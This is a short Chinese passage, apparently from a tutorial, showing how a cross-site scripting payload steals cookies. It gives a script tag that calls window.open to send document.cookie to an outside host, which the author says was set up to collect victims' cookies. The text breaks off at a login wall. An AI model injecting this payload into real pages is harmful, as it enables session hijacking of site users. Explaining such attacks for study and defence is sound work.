我们直接输入<script>window.open(“www.jwdstef.com?param=”+document.cookie)</script>,当用户查看这个页面的时候,就会请求www.jwdstef.com这个站点,这个站点是我自己搭建的专门用来收集用户cookie的,这样我就盗取了用户的cookie。我们直接输入<script>window.open(“www.jwdstef.com?param=” 你的当前访问异常,请进行认证后继续阅读剩余内容。 提交